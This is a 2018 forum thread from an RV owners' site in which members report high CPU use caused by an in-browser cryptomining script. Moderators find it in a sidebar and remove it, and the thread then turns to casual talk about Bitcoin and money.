
Thank you, John! I was ready to quit using the forum. In the past few weeks, every time I opened the forum page the fan on my computer started up, meaning some heavy duty processing happening. This made me wonder what the heck was going on, and worried it was something not good. I installed your fix and no more fan starting up!

Tom 72 06-30-2018 10:10 AM

Interesting, John
My first reaction was to chuckle, thinking there are no coins to be mined here. But that isn't the point.

The point is to potentially use members processors remotely as part of a massive computing effort, perhaps without members knowing.

Is it possible? Some may recall SETI, Seti.org is a site that used to harness idle processing power from volunteers to Search Extra Terrestrial life - UFOs. SETI is still around, their focus seems to have shifted.

Some trojan viruses create massive computing power without users consent or knowledge. It is possible. It should be evaluated.

Mary F 06-30-2018 10:11 AM

We have notified our tech people about this issue.

Thanks to all for the heads up. :bowdown

I join you in hoping it can be addressed ASAP!

floyd 06-30-2018 10:59 AM

So what should the average comparative Luddite member here do to protect himself, if anything?


What can the site do to remedy the problem?


Could this be the cause of a slow CPU which requires a restart to get back to normal?

Daniel A. 06-30-2018 11:52 AM

My Kaspersky keeps blocking it, its been doing this for the last couple of day's.

Janet H 06-30-2018 11:53 AM

Quote:

Originally Posted by Daniel A. (Post 704365)
My Kaspersky keeps blocking it, its been doing this for the last couple of day's.

We are actively looking at this - thanks for your patience.

Daniel A. 06-30-2018 12:01 PM

Thanks the message I get say's


Dangerous URL blocked.
URL listed in database of malicious ULR's

John in Santa Cruz 06-30-2018 12:30 PM

btw, that block of obfuscated code in my post #3 on this thread, I have no way of knowing if thats whats actually invoking the WebSocket calls to the .ru site or not, as the code is totally obfuscated.... makes it really hard to trace whats going on.

John in Santa Cruz 06-30-2018 12:38 PM

Quote:

Originally Posted by Tom 72 (Post 704338)
Interesting, John
My first reaction was to chuckle, thinking there are no coins to be mined here. But that isn't the point.

The point is to potentially use members processors remotely as part of a massive computing effort, perhaps without members knowing.

Is it possible? Some may recall SETI, Seti.org is a site that used to harness idle processing power from volunteers to Search Extra Terrestrial life - UFOs. SETI is still around, their focus seems to have shifted.

Some trojan viruses create massive computing power without users consent or knowledge. It is possible. It should be evaluated.

thats exactly what this trojan is doing... its using everyone's webbrowser to 'mine' some sort of cryptocurrency (bitcoin is only one of dozens of similar things) ...

Friz 06-30-2018 12:44 PM

Has anybody tried this malicious site running Linux? If the website tries to run executable code, either nothing happens or the browser usually freezes.

Janet H 06-30-2018 01:54 PM

We've located the issue and disabled the Registry display in the side bar for now. There appeared to be a malicious link that was exploiting CPUs (as speculated earlier on this thread). The link and associated flotsam has been removed.


There should be no issue at this point for local systems as the only purpose of the link to mine for bit coin by leveraging CPUs. After examining the link and associated information we are confident that nothing was downloaded to local systems and there was no access to member information or the sites database.

You can read more about crypto mining here: https://en.wikipedia.org/wiki/Bitcoin

sokhapkin 06-30-2018 03:19 PM

Quote:

Originally Posted by Friz (Post 704388)
Has anybody tried this malicious site running Linux? If the website tries to run executable code, either nothing happens or the browser usually freezes.

It doesn't matter which OS do you run. I run Linux. The malicious code is javascript which is being executed by your web browser.It is OS-independent.

John in Santa Cruz 07-01-2018 12:25 AM

per the other thread on this, the 'house' has fixed the problem :) had something to do with the 'registry' sidebar, so they turned that off. so mitigations like blocking that qxxxxxxx.ru URL, probably not needed.

Patdeesky 07-01-2018 12:52 AM

My entire empire of 1 imaginary bitcoin for a trailer please.... /sarc if no one catches it/

John in Santa Cruz 07-01-2018 01:00 AM

my older kid, a postgrad research assistant, has made a fair bit of money playing the coin market. he wasn't mining, he was doing arbitrage stuff, buying and selling positions. he pulled 4-5X his initial investment in cash when he got out.

Glenn Baglo 07-01-2018 09:14 AM

With the site fix, I can now use my MacBook Air laptop without frying my thighs.
Recently, it had gotten so hot that I would shut it down. Makes me wonder about damage to computers that are victims.


As for Bitcoin, I'd like to know how you can mine something that doesn't exist. Actually, no I don't want to know. Recent stories about how these "currencies" were manipulated to generate profits for some.

Civilguy 07-01-2018 09:42 AM

I reported this to the mods yesterday and said that I didn't have the same symptoms. Then I came to realize that it was running about 40% of my processor. Maybe my computer is one of the slower kids, like me? :u

I installed uBlock Origin on my desktop a few months ago. I was conflicted about this as ads are what pays for so the operation of many web sites. I have to say that this Chrome extension has done a really great job of corralling some of the most obnoxious ads.

Somewhat off-topic, I am one of the people that sends a few dollars to pay for Irfanview, MP3Tag, and Fiberglass-RV-for-sale before I even listed a trailer on their site; things like that. The Internet is not really free folks; that's why our information is now one of the primary products being marketed. I will posit that almost nothing costs so much as something billed as being "free".

End of lecture, TYVM.

Carl V 07-01-2018 10:04 AM

Quote:

Originally Posted by Glenn Baglo (Post 704528)
With the site fix, I can now use my MacBook Air laptop without frying my thighs.
Recently, it had gotten so hot that I would shut it down. Makes me wonder about damage to computers that are victims.

Macbook Pro here. Never had any issue like that with this site (or any other).
I figured this was a Windows thing...

Strange...!

Jon Vermilye 07-01-2018 10:40 AM

Quote:

Originally Posted by Carl V (Post 704542)
Macbook Pro here. Never had any issue like that with this site (or any other).
I figured this was a Windows thing...

Strange...!

Nope. I've often had the cooling fans come on in my MacBookPro when here at Fiberglass RV for no apparent reason. Didn't happen today...

Jon in AZ 07-02-2018 10:42 AM

Fixed!
 
Same here with my MacBook Pro. It was a recent problem, and I had been using my mobile device via the app most of the time as a result.

It is now fixed, as reported by site admins elsewhere. All is back to normal on my Mac, too.

Quick response from the site team!!! :thumb

Doctor Harold 07-02-2018 11:47 AM

Bitcoin is not much different than the money in your wallet. Paper dollars only have value because we all agree that they do, and we trust the US government to back that up. Ever hear the expression about some failed country's money that it's not worth the paper it's printed on?

Most dollars that exist in the American economy do not exist as paper. The money in your checking account, savings account, the money you owe on your credit card, and the balance owed on your mortgage, as well as the money you consider equity used to exist as notations on a ledger sheet, and now only in a computer file.

Whether it's seashells, dollars, bitcoin, gold bars, or wampum, the value only exists because we believe -- and agree -- that it exists.

Without agreement on the value of a particular form of money, that money ceases to exist. In other words: all money is basically imaginary.

Mike Magee 07-03-2018 05:41 PM

Quote:

Originally Posted by Doctor Harold (Post 704799)
Bitcoin is not much different than the money in your wallet. Paper dollars only have value because we all agree that they do, and we trust the US government to back that up. Ever hear the expression about some failed country's money that it's not worth the paper it's printed on?

Most dollars that exist in the American economy do not exist as paper. The money in your checking account, savings account, the money you owe on your credit card, and the balance owed on your mortgage, as well as the money you consider equity used to exist as notations on a ledger sheet, and now only in a computer file.

Whether it's seashells, dollars, bitcoin, gold bars, or wampum, the value only exists because we believe -- and agree -- that it exists.

Without agreement on the value of a particular form of money, that money ceases to exist. In other words: all money is basically imaginary.

Shhhh. Don't stampede the herd. ;)

Doctor Harold 07-03-2018 08:03 PM

Quote:

Originally Posted by Mike Magee (Post 705138)
Shhhh. Don't stampede the herd. ;)

:roflol


All times are GMT -6. The time now is 10:23 AM.

Powered by vBulletin® Version 3.8.11
Copyright ©2000 - 2020, vBulletin Solutions Inc.